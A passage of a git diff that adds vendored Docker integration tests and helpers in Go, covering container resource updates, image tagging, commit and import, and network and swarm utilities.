assert.NilError(t, err) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(setMemory, inspect.HostConfig.Memory)) + assert.Check(t, is.Equal(setMemorySwap, inspect.HostConfig.MemorySwap)) + + res, err := container.Exec(ctx, client, cID, + []string{"cat", "/sys/fs/cgroup/memory/memory.limit_in_bytes"}) + assert.NilError(t, err) + assert.Assert(t, is.Len(res.Stderr(), 0)) + assert.Equal(t, 0, res.ExitCode) + assert.Check(t, is.Equal(strconv.FormatInt(setMemory, 10), strings.TrimSpace(res.Stdout()))) + + res, err = container.Exec(ctx, client, cID, + []string{"cat", "/sys/fs/cgroup/memory/memory.memsw.limit_in_bytes"}) + assert.NilError(t, err) + assert.Assert(t, is.Len(res.Stderr(), 0)) + assert.Equal(t, 0, res.ExitCode) + assert.Check(t, is.Equal(strconv.FormatInt(setMemorySwap, 10), strings.TrimSpace(res.Stdout()))) +} + +func TestUpdateCPUQuota(t *testing.T) { + t.Parallel() + + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client) + + for _, test := range []struct { + desc string + update int64 + }{ + {desc: "some random value", update: 15000}, + {desc: "a higher value", update: 20000}, + {desc: "a lower value", update: 10000}, + {desc: "unset value", update: -1}, + } { + if _, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{ + Resources: containertypes.Resources{ + CPUQuota: test.update, + }, + }); err != nil { + t.Fatal(err) + } + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(test.update, inspect.HostConfig.CPUQuota)) + + res, err := container.Exec(ctx, client, cID, + []string{"/bin/cat", "/sys/fs/cgroup/cpu/cpu.cfs_quota_us"}) + assert.NilError(t, err) + assert.Assert(t, is.Len(res.Stderr(), 0)) + assert.Equal(t, 0, res.ExitCode) + + assert.Check(t, is.Equal(strconv.FormatInt(test.update, 10), strings.TrimSpace(res.Stdout()))) + } +} diff --git a/vendor/github.com/docker/docker/integration/container/update_test.go b/vendor/github.com/docker/docker/integration/container/update_test.go new file mode 100644 index 0000000000..0e32184d27 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/container/update_test.go @@ -0,0 +1,64 @@ +package container // import "github.com/docker/docker/integration/container" + +import ( + "context" + "testing" + "time" + + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/poll" +) + +func TestUpdateRestartPolicy(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, container.WithCmd("sh", "-c", "sleep 1 && false"), func(c *container.TestContainerConfig) { + c.HostConfig.RestartPolicy = containertypes.RestartPolicy{ + Name: "on-failure", + MaximumRetryCount: 3, + } + }) + + _, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{ + RestartPolicy: containertypes.RestartPolicy{ + Name: "on-failure", + MaximumRetryCount: 5, + }, + }) + assert.NilError(t, err) + + timeout := 60 * time.Second + if testEnv.OSType == "windows" { + timeout = 180 * time.Second + } + + poll.WaitOn(t, container.IsInState(ctx, client, cID, "exited"), poll.WithDelay(100*time.Millisecond), poll.WithTimeout(timeout)) + + inspect, err := client.ContainerInspect(ctx, cID) + assert.NilError(t, err) + assert.Check(t, is.Equal(inspect.RestartCount, 5)) + assert.Check(t, is.Equal(inspect.HostConfig.RestartPolicy.MaximumRetryCount, 5)) +} + +func TestUpdateRestartWithAutoRemove(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID := container.Run(t, ctx, client, func(c *container.TestContainerConfig) { + c.HostConfig.AutoRemove = true + }) + + _, err := client.ContainerUpdate(ctx, cID, containertypes.UpdateConfig{ + RestartPolicy: containertypes.RestartPolicy{ + Name: "always", + }, + }) + assert.Check(t, is.ErrorContains(err, "Restart policy cannot be updated because AutoRemove is enabled for the container")) +} diff --git a/vendor/github.com/docker/docker/integration/doc.go b/vendor/github.com/docker/docker/integration/doc.go new file mode 100644 index 0000000000..ee4bf50430 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/doc.go @@ -0,0 +1,3 @@ +// Package integration provides integrations tests for Moby (API). +// These tests require a daemon (dockerd for now) to run. +package integration // import "github.com/docker/docker/integration" diff --git a/vendor/github.com/docker/docker/integration/image/commit_test.go b/vendor/github.com/docker/docker/integration/image/commit_test.go new file mode 100644 index 0000000000..4555391262 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/image/commit_test.go @@ -0,0 +1,48 @@ +package image // import "github.com/docker/docker/integration/image" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +func TestCommitInheritsEnv(t *testing.T) { + skip.If(t, versions.LessThan(testEnv.DaemonAPIVersion(), "1.36"), "broken in earlier versions") + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + cID1 := container.Create(t, ctx, client) + + commitResp1, err := client.ContainerCommit(ctx, cID1, types.ContainerCommitOptions{ + Changes: []string{"ENV PATH=/bin"}, + Reference: "test-commit-image", + }) + assert.NilError(t, err) + + image1, _, err := client.ImageInspectWithRaw(ctx, commitResp1.ID) + assert.NilError(t, err) + + expectedEnv1 := []string{"PATH=/bin"} + assert.Check(t, is.DeepEqual(expectedEnv1, image1.Config.Env)) + + cID2 := container.Create(t, ctx, client, container.WithImage(image1.ID)) + + commitResp2, err := client.ContainerCommit(ctx, cID2, types.ContainerCommitOptions{ + Changes: []string{"ENV PATH=/usr/bin:$PATH"}, + Reference: "test-commit-image", + }) + assert.NilError(t, err) + + image2, _, err := client.ImageInspectWithRaw(ctx, commitResp2.ID) + assert.NilError(t, err) + expectedEnv2 := []string{"PATH=/usr/bin:/bin"} + assert.Check(t, is.DeepEqual(expectedEnv2, image2.Config.Env)) +} diff --git a/vendor/github.com/docker/docker/integration/image/import_test.go b/vendor/github.com/docker/docker/integration/image/import_test.go new file mode 100644 index 0000000000..89dddf2cc8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/image/import_test.go @@ -0,0 +1,42 @@ +package image // import "github.com/docker/docker/integration/image" + +import ( + "archive/tar" + "bytes" + "context" + "io" + "runtime" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/internal/testutil" +) + +// Ensure we don't regress on CVE-2017-14992. +func TestImportExtremelyLargeImageWorks(t *testing.T) { + if runtime.GOARCH == "arm64" { + t.Skip("effective test will be time out") + } + + client := request.NewAPIClient(t) + + // Construct an empty tar archive with about 8GB of junk padding at the + // end. This should not cause any crashes (the padding should be mostly + // ignored). + var tarBuffer bytes.Buffer + + tw := tar.NewWriter(&tarBuffer) + if err := tw.Close(); err != nil { + t.Fatal(err) + } + imageRdr := io.MultiReader(&tarBuffer, io.LimitReader(testutil.DevZero, 8*1024*1024*1024)) + + _, err := client.ImageImport(context.Background(), + types.ImageImportSource{Source: imageRdr, SourceName: "-"}, + "test1234:v42", + types.ImageImportOptions{}) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/integration/image/main_test.go b/vendor/github.com/docker/docker/integration/image/main_test.go new file mode 100644 index 0000000000..1b4270dfc6 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/image/main_test.go @@ -0,0 +1,33 @@ +package image // import "github.com/docker/docker/integration/image" + +import ( + "fmt" + "os" + "testing" + + "github.com/docker/docker/internal/test/environment" +) + +var testEnv *environment.Execution + +func TestMain(m *testing.M) { + var err error + testEnv, err = environment.New() + if err != nil { + fmt.Println(err) + os.Exit(1) + } + err = environment.EnsureFrozenImagesLinux(testEnv) + if err != nil { + fmt.Println(err) + os.Exit(1) + } + + testEnv.Print() + os.Exit(m.Run()) +} + +func setupTest(t *testing.T) func() { + environment.ProtectAll(t, testEnv) + return func() { testEnv.Clean(t) } +} diff --git a/vendor/github.com/docker/docker/integration/image/remove_test.go b/vendor/github.com/docker/docker/integration/image/remove_test.go new file mode 100644 index 0000000000..4f9122a5e3 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/image/remove_test.go @@ -0,0 +1,59 @@ +package image // import "github.com/docker/docker/integration/image" + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/integration/internal/container" + "github.com/docker/docker/internal/test/request" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestRemoveImageOrphaning(t *testing.T) { + defer setupTest(t)() + ctx := context.Background() + client := request.NewAPIClient(t) + + img := "test-container-orphaning" + + // Create a container from busybox, and commit a small change so we have a new image + cID1 := container.Create(t, ctx, client, container.WithCmd("")) + commitResp1, err := client.ContainerCommit(ctx, cID1, types.ContainerCommitOptions{ + Changes: []string{`ENTRYPOINT ["true"]`}, + Reference: img, + }) + assert.NilError(t, err) + + // verifies that reference now points to first image + resp, _, err := client.ImageInspectWithRaw(ctx, img) + assert.NilError(t, err) + assert.Check(t, is.Equal(resp.ID, commitResp1.ID)) + + // Create a container from created image, and commit a small change with same reference name + cID2 := container.Create(t, ctx, client, container.WithImage(img), container.WithCmd("")) + commitResp2, err := client.ContainerCommit(ctx, cID2, types.ContainerCommitOptions{ + Changes: []string{`LABEL Maintainer="Integration Tests"`}, + Reference: img, + }) + assert.NilError(t, err) + + // verifies that reference now points to second image + resp, _, err = client.ImageInspectWithRaw(ctx, img) + assert.NilError(t, err) + assert.Check(t, is.Equal(resp.ID, commitResp2.ID)) + + // try to remove the image, should not error out. + _, err = client.ImageRemove(ctx, img, types.ImageRemoveOptions{}) + assert.NilError(t, err) + + // check if the first image is still there + resp, _, err = client.ImageInspectWithRaw(ctx, commitResp1.ID) + assert.NilError(t, err) + assert.Check(t, is.Equal(resp.ID, commitResp1.ID)) + + // check if the second image has been deleted + _, _, err = client.ImageInspectWithRaw(ctx, commitResp2.ID) + assert.Check(t, is.ErrorContains(err, "No such image:")) +} diff --git a/vendor/github.com/docker/docker/integration/image/tag_test.go b/vendor/github.com/docker/docker/integration/image/tag_test.go new file mode 100644 index 0000000000..55c3ff7b2b --- /dev/null +++ b/vendor/github.com/docker/docker/integration/image/tag_test.go @@ -0,0 +1,140 @@ +package image // import "github.com/docker/docker/integration/image" + +import ( + "context" + "fmt" + "testing" + + "github.com/docker/docker/internal/test/request" + "github.com/docker/docker/internal/testutil" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +// tagging a named image in a new unprefixed repo should work +func TestTagUnprefixedRepoByNameOrName(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + // By name + err := client.ImageTag(ctx, "busybox:latest", "testfoobarbaz") + assert.NilError(t, err) + + // By ID + insp, _, err := client.ImageInspectWithRaw(ctx, "busybox") + assert.NilError(t, err) + err = client.ImageTag(ctx, insp.ID, "testfoobarbaz") + assert.NilError(t, err) +} + +// ensure we don't allow the use of invalid repository names or tags; these tag operations should fail +// TODO (yongtang): Migrate to unit tests +func TestTagInvalidReference(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + invalidRepos := []string{"fo$z$", "Foo@3cc", "Foo$3", "Foo*3", "Fo^3", "Foo!3", "F)xcz(", "fo%asd", "FOO/bar"} + + for _, repo := range invalidRepos { + err := client.ImageTag(ctx, "busybox", repo) + assert.Check(t, is.ErrorContains(err, "not a valid repository/tag")) + } + + longTag := testutil.GenerateRandomAlphaOnlyString(121) + + invalidTags := []string{"repo:fo$z$", "repo:Foo@3cc", "repo:Foo$3", "repo:Foo*3", "repo:Fo^3", "repo:Foo!3", "repo:%goodbye", "repo:#hashtagit", "repo:F)xcz(", "repo:-foo", "repo:..", longTag} + + for _, repotag := range invalidTags { + err := client.ImageTag(ctx, "busybox", repotag) + assert.Check(t, is.ErrorContains(err, "not a valid repository/tag")) + } + + // test repository name begin with '-' + err := client.ImageTag(ctx, "busybox:latest", "-busybox:test") + assert.Check(t, is.ErrorContains(err, "Error parsing reference")) + + // test namespace name begin with '-' + err = client.ImageTag(ctx, "busybox:latest", "-test/busybox:test") + assert.Check(t, is.ErrorContains(err, "Error parsing reference")) + + // test index name begin with '-' + err = client.ImageTag(ctx, "busybox:latest", "-index:5000/busybox:test") + assert.Check(t, is.ErrorContains(err, "Error parsing reference")) + + // test setting tag fails + err = client.ImageTag(ctx, "busybox:latest", "sha256:sometag") + assert.Check(t, is.ErrorContains(err, "refusing to create an ambiguous tag using digest algorithm as name")) +} + +// ensure we allow the use of valid tags +func TestTagValidPrefixedRepo(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + validRepos := []string{"fooo/bar", "fooaa/test", "foooo:t", "HOSTNAME.DOMAIN.COM:443/foo/bar"} + + for _, repo := range validRepos { + err := client.ImageTag(ctx, "busybox", repo) + assert.NilError(t, err) + } +} + +// tag an image with an existed tag name without -f option should work +func TestTagExistedNameWithoutForce(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + err := client.ImageTag(ctx, "busybox:latest", "busybox:test") + assert.NilError(t, err) +} + +// ensure tagging using official names works +// ensure all tags result in the same name +func TestTagOfficialNames(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + names := []string{ + "docker.io/busybox", + "index.docker.io/busybox", + "library/busybox", + "docker.io/library/busybox", + "index.docker.io/library/busybox", + } + + for _, name := range names { + err := client.ImageTag(ctx, "busybox", name+":latest") + assert.NilError(t, err) + + // ensure we don't have multiple tag names. + insp, _, err := client.ImageInspectWithRaw(ctx, "busybox") + assert.NilError(t, err) + assert.Assert(t, !is.Contains(insp.RepoTags, name)().Success()) + } + + for _, name := range names { + err := client.ImageTag(ctx, name+":latest", "fooo/bar:latest") + assert.NilError(t, err) + } +} + +// ensure tags can not match digests +func TestTagMatchesDigest(t *testing.T) { + defer setupTest(t)() + client := request.NewAPIClient(t) + ctx := context.Background() + + digest := "busybox@sha256:abcdef76720241213f5303bda7704ec4c2ef75613173910a56fb1b6e20251507" + // test setting tag fails + err := client.ImageTag(ctx, "busybox:latest", digest) + assert.Check(t, is.ErrorContains(err, "refusing to create a tag with a digest reference")) + + // check that no new image matches the digest + _, _, err = client.ImageInspectWithRaw(ctx, digest) + assert.Check(t, is.ErrorContains(err, fmt.Sprintf("No such image: %s", digest))) +} diff --git a/vendor/github.com/docker/docker/integration/internal/container/container.go b/vendor/github.com/docker/docker/integration/internal/container/container.go new file mode 100644 index 0000000000..489e07154a --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/container/container.go @@ -0,0 +1,54 @@ +package container + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/client" + "gotest.tools/assert" +) + +// TestContainerConfig holds container configuration struct that +// are used in api calls. +type TestContainerConfig struct { + Name string + Config *container.Config + HostConfig *container.HostConfig + NetworkingConfig *network.NetworkingConfig +} + +// Create creates a container with the specified options +func Create(t *testing.T, ctx context.Context, client client.APIClient, ops ...func(*TestContainerConfig)) string { // nolint: golint + t.Helper() + config := &TestContainerConfig{ + Config: &container.Config{ + Image: "busybox", + Cmd: []string{"top"}, + }, + HostConfig: &container.HostConfig{}, + NetworkingConfig: &network.NetworkingConfig{}, + } + + for _, op := range ops { + op(config) + } + + c, err := client.ContainerCreate(ctx, config.Config, config.HostConfig, config.NetworkingConfig, config.Name) + assert.NilError(t, err) + + return c.ID +} + +// Run creates and start a container with the specified options +func Run(t *testing.T, ctx context.Context, client client.APIClient, ops ...func(*TestContainerConfig)) string { // nolint: golint + t.Helper() + id := Create(t, ctx, client, ops...) + + err := client.ContainerStart(ctx, id, types.ContainerStartOptions{}) + assert.NilError(t, err) + + return id +} diff --git a/vendor/github.com/docker/docker/integration/internal/container/exec.go b/vendor/github.com/docker/docker/integration/internal/container/exec.go new file mode 100644 index 0000000000..55ad23aeb5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/container/exec.go @@ -0,0 +1,86 @@ +package container + +import ( + "bytes" + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/pkg/stdcopy" +) + +// ExecResult represents a result returned from Exec() +type ExecResult struct { + ExitCode int + outBuffer *bytes.Buffer + errBuffer *bytes.Buffer +} + +// Stdout returns stdout output of a command run by Exec() +func (res *ExecResult) Stdout() string { + return res.outBuffer.String() +} + +// Stderr returns stderr output of a command run by Exec() +func (res *ExecResult) Stderr() string { + return res.errBuffer.String() +} + +// Combined returns combined stdout and stderr output of a command run by Exec() +func (res *ExecResult) Combined() string { + return res.outBuffer.String() + res.errBuffer.String() +} + +// Exec executes a command inside a container, returning the result +// containing stdout, stderr, and exit code. Note: +// - this is a synchronous operation; +// - cmd stdin is closed. +func Exec(ctx context.Context, cli client.APIClient, id string, cmd []string) (ExecResult, error) { + // prepare exec + execConfig := types.ExecConfig{ + AttachStdout: true, + AttachStderr: true, + Cmd: cmd, + } + cresp, err := cli.ContainerExecCreate(ctx, id, execConfig) + if err != nil { + return ExecResult{}, err + } + execID := cresp.ID + + // run it, with stdout/stderr attached + aresp, err := cli.ContainerExecAttach(ctx, execID, types.ExecStartCheck{}) + if err != nil { + return ExecResult{}, err + } + defer aresp.Close() + + // read the output + var outBuf, errBuf bytes.Buffer + outputDone := make(chan error) + + go func() { + // StdCopy demultiplexes the stream into two buffers + _, err = stdcopy.StdCopy(&outBuf, &errBuf, aresp.Reader) + outputDone <- err + }() + + select { + case err := <-outputDone: + if err != nil { + return ExecResult{}, err + } + break + + case <-ctx.Done(): + return ExecResult{}, ctx.Err() + } + + // get the exit code + iresp, err := cli.ContainerExecInspect(ctx, execID) + if err != nil { + return ExecResult{}, err + } + + return ExecResult{ExitCode: iresp.ExitCode, outBuffer: &outBuf, errBuffer: &errBuf}, nil +} diff --git a/vendor/github.com/docker/docker/integration/internal/container/ops.go b/vendor/github.com/docker/docker/integration/internal/container/ops.go new file mode 100644 index 0000000000..df5598b62f --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/container/ops.go @@ -0,0 +1,136 @@ +package container + +import ( + "fmt" + + containertypes "github.com/docker/docker/api/types/container" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/strslice" + "github.com/docker/go-connections/nat" +) + +// WithName sets the name of the container +func WithName(name string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Name = name + } +} + +// WithLinks sets the links of the container +func WithLinks(links ...string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.HostConfig.Links = links + } +} + +// WithImage sets the image of the container +func WithImage(image string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Config.Image = image + } +} + +// WithCmd sets the comannds of the container +func WithCmd(cmds ...string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Config.Cmd = strslice.StrSlice(cmds) + } +} + +// WithNetworkMode sets the network mode of the container +func WithNetworkMode(mode string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.HostConfig.NetworkMode = containertypes.NetworkMode(mode) + } +} + +// WithExposedPorts sets the exposed ports of the container +func WithExposedPorts(ports ...string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Config.ExposedPorts = map[nat.Port]struct{}{} + for _, port := range ports { + c.Config.ExposedPorts[nat.Port(port)] = struct{}{} + } + } +} + +// WithTty sets the TTY mode of the container +func WithTty(tty bool) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Config.Tty = tty + } +} + +// WithWorkingDir sets the working dir of the container +func WithWorkingDir(dir string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.Config.WorkingDir = dir + } +} + +// WithVolume sets the volume of the container +func WithVolume(name string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + if c.Config.Volumes == nil { + c.Config.Volumes = map[string]struct{}{} + } + c.Config.Volumes[name] = struct{}{} + } +} + +// WithBind sets the bind mount of the container +func WithBind(src, target string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + c.HostConfig.Binds = append(c.HostConfig.Binds, fmt.Sprintf("%s:%s", src, target)) + } +} + +// WithIPv4 sets the specified ip for the specified network of the container +func WithIPv4(network, ip string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + if c.NetworkingConfig.EndpointsConfig == nil { + c.NetworkingConfig.EndpointsConfig = map[string]*networktypes.EndpointSettings{} + } + if v, ok := c.NetworkingConfig.EndpointsConfig[network]; !ok || v == nil { + c.NetworkingConfig.EndpointsConfig[network] = &networktypes.EndpointSettings{} + } + if c.NetworkingConfig.EndpointsConfig[network].IPAMConfig == nil { + c.NetworkingConfig.EndpointsConfig[network].IPAMConfig = &networktypes.EndpointIPAMConfig{} + } + c.NetworkingConfig.EndpointsConfig[network].IPAMConfig.IPv4Address = ip + } +} + +// WithIPv6 sets the specified ip6 for the specified network of the container +func WithIPv6(network, ip string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + if c.NetworkingConfig.EndpointsConfig == nil { + c.NetworkingConfig.EndpointsConfig = map[string]*networktypes.EndpointSettings{} + } + if v, ok := c.NetworkingConfig.EndpointsConfig[network]; !ok || v == nil { + c.NetworkingConfig.EndpointsConfig[network] = &networktypes.EndpointSettings{} + } + if c.NetworkingConfig.EndpointsConfig[network].IPAMConfig == nil { + c.NetworkingConfig.EndpointsConfig[network].IPAMConfig = &networktypes.EndpointIPAMConfig{} + } + c.NetworkingConfig.EndpointsConfig[network].IPAMConfig.IPv6Address = ip + } +} + +// WithLogDriver sets the log driver to use for the container +func WithLogDriver(driver string) func(*TestContainerConfig) { + return func(c *TestContainerConfig) { + if c.HostConfig == nil { + c.HostConfig = &containertypes.HostConfig{} + } + c.HostConfig.LogConfig.Type = driver + } +} + +// WithAutoRemove sets the container to be removed on exit +func WithAutoRemove(c *TestContainerConfig) { + if c.HostConfig == nil { + c.HostConfig = &containertypes.HostConfig{} + } + c.HostConfig.AutoRemove = true +} diff --git a/vendor/github.com/docker/docker/integration/internal/container/states.go b/vendor/github.com/docker/docker/integration/internal/container/states.go new file mode 100644 index 0000000000..088407deb8 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/container/states.go @@ -0,0 +1,41 @@ +package container + +import ( + "context" + "strings" + + "github.com/docker/docker/client" + "gotest.tools/poll" +) + +// IsStopped verifies the container is in stopped state. +func IsStopped(ctx context.Context, client client.APIClient, containerID string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + inspect, err := client.ContainerInspect(ctx, containerID) + + switch { + case err != nil: + return poll.Error(err) + case !inspect.State.Running: + return poll.Success() + default: + return poll.Continue("waiting for container to be stopped") + } + } +} + +// IsInState verifies the container is in one of the specified state, e.g., "running", "exited", etc. +func IsInState(ctx context.Context, client client.APIClient, containerID string, state ...string) func(log poll.LogT) poll.Result { + return func(log poll.LogT) poll.Result { + inspect, err := client.ContainerInspect(ctx, containerID) + if err != nil { + return poll.Error(err) + } + for _, v := range state { + if inspect.State.Status == v { + return poll.Success() + } + } + return poll.Continue("waiting for container to be one of (%s), currently %s", strings.Join(state, ", "), inspect.State.Status) + } +} diff --git a/vendor/github.com/docker/docker/integration/internal/network/network.go b/vendor/github.com/docker/docker/integration/internal/network/network.go new file mode 100644 index 0000000000..9c13114f92 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/network/network.go @@ -0,0 +1,35 @@ +package network + +import ( + "context" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "gotest.tools/assert" +) + +func createNetwork(ctx context.Context, client client.APIClient, name string, ops ...func(*types.NetworkCreate)) (string, error) { + config := types.NetworkCreate{} + + for _, op := range ops { + op(&config) + } + + n, err := client.NetworkCreate(ctx, name, config) + return n.ID, err +} + +// Create creates a network with the specified options +func Create(ctx context.Context, client client.APIClient, name string, ops ...func(*types.NetworkCreate)) (string, error) { + return createNetwork(ctx, client, name, ops...) +} + +// CreateNoError creates a network with the specified options and verifies there were no errors +func CreateNoError(t *testing.T, ctx context.Context, client client.APIClient, name string, ops ...func(*types.NetworkCreate)) string { // nolint: golint + t.Helper() + + name, err := createNetwork(ctx, client, name, ops...) + assert.NilError(t, err) + return name +} diff --git a/vendor/github.com/docker/docker/integration/internal/network/ops.go b/vendor/github.com/docker/docker/integration/internal/network/ops.go new file mode 100644 index 0000000000..190918abed --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/network/ops.go @@ -0,0 +1,87 @@ +package network + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" +) + +// WithDriver sets the driver of the network +func WithDriver(driver string) func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.Driver = driver + } +} + +// WithIPv6 Enables IPv6 on the network +func WithIPv6() func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.EnableIPv6 = true + } +} + +// WithCheckDuplicate enables CheckDuplicate on the create network request +func WithCheckDuplicate() func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.CheckDuplicate = true + } +} + +// WithInternal sets the Internal flag on the network +func WithInternal() func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.Internal = true + } +} + +// WithMacvlan sets the network as macvlan with the specified parent +func WithMacvlan(parent string) func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.Driver = "macvlan" + if parent != "" { + n.Options = map[string]string{ + "parent": parent, + } + } + } +} + +// WithIPvlan sets the network as ipvlan with the specified parent and mode +func WithIPvlan(parent, mode string) func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + n.Driver = "ipvlan" + if n.Options == nil { + n.Options = map[string]string{} + } + if parent != "" { + n.Options["parent"] = parent + } + if mode != "" { + n.Options["ipvlan_mode"] = mode + } + } +} + +// WithOption adds the specified key/value pair to network's options +func WithOption(key, value string) func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + if n.Options == nil { + n.Options = map[string]string{} + } + n.Options[key] = value + } +} + +// WithIPAM adds an IPAM with the specified Subnet and Gateway to the network +func WithIPAM(subnet, gateway string) func(*types.NetworkCreate) { + return func(n *types.NetworkCreate) { + if n.IPAM == nil { + n.IPAM = &network.IPAM{} + } + + n.IPAM.Config = append(n.IPAM.Config, network.IPAMConfig{ + Subnet: subnet, + Gateway: gateway, + AuxAddress: map[string]string{}, + }) + } +} diff --git a/vendor/github.com/docker/docker/integration/internal/requirement/requirement.go b/vendor/github.com/docker/docker/integration/internal/requirement/requirement.go new file mode 100644 index 0000000000..004383bd05 --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/requirement/requirement.go @@ -0,0 +1,53 @@ +package requirement // import "github.com/docker/docker/integration/internal/requirement" + +import ( + "net/http" + "strings" + "testing" + "time" + + "github.com/docker/docker/pkg/parsers/kernel" + "gotest.tools/icmd" +) + +// HasHubConnectivity checks to see if https://hub.docker.com is +// accessible from the present environment +func HasHubConnectivity(t *testing.T) bool { + t.Helper() + // Set a timeout on the GET at 15s + var timeout = 15 * time.Second + var url = "https://hub.docker.com" + + client := http.Client{Timeout: timeout} + resp, err := client.Get(url) + if err != nil && strings.Contains(err.Error(), "use of closed network connection") { + t.Fatalf("Timeout for GET request on %s", url) + } + if resp != nil { + resp.Body.Close() + } + return err == nil +} + +func overlayFSSupported() bool { + result := icmd.RunCommand("/bin/sh", "-c", "cat /proc/filesystems") + if result.Error != nil { + return false + } + return strings.Contains(result.Combined(), "overlay\n") +} + +// Overlay2Supported returns true if the current system supports overlay2 as graphdriver +func Overlay2Supported(kernelVersion string) bool { + if !overlayFSSupported() { + return false + } + + daemonV, err := kernel.ParseRelease(kernelVersion) + if err != nil { + return false + } + requiredV := kernel.VersionInfo{Kernel: 4} + return kernel.CompareKernelVersion(*daemonV, requiredV) > -1 + +} diff --git a/vendor/github.com/docker/docker/integration/internal/swarm/service.go b/vendor/github.com/docker/docker/integration/internal/swarm/service.go new file mode 100644 index 0000000000..d8b16224fb --- /dev/null +++ b/vendor/github.com/docker/docker/integration/internal/swarm/service.go @@ -0,0 +1,200 @@ +package swarm + +import ( + "context" + "runtime" + "testing" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + swarmtypes "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/environment" + "gotest.tools/assert" + "gotest.tools/poll" + "gotest.tools/skip" +) + +// ServicePoll tweaks the pollSettings for `service` +func ServicePoll(config *poll.Settings) { + // Override the default pollSettings for `service` resource here ... + config.Timeout = 30 * time.Second + config.Delay = 100 * time.Millisecond + if runtime.GOARCH == "arm64" || runtime.GOARCH == "arm" { + config.Timeout = 90 * time.Second + } +} + +// NetworkPoll tweaks the pollSettings for `network` +func NetworkPoll(config *poll.Settings) { + // Override the default pollSettings for `network` resource here ... + config.Timeout = 30 * time.Second + config.Delay = 100 * time.Millisecond + + if runtime.GOARCH == "arm64" || runtime.GOARCH == "arm" { + config.Timeout = 50 * time.Second + } +} + +// ContainerPoll tweaks the pollSettings for `container` +func ContainerPoll(config *poll.Settings) { + // Override the default pollSettings for `container` resource here ... + + if runtime.GOARCH == "arm64" || runtime.GOARCH == "arm" { + config.Timeout = 30 * time.Second + config.Delay = 100 * time.Millisecond + } +} + +// NewSwarm creates a swarm daemon for testing +func NewSwarm(t *testing.T, testEnv *environment.Execution, ops ...func(*daemon.Daemon)) *daemon.Daemon { + t.Helper() + skip.If(t, testEnv.IsRemoteDaemon) + if 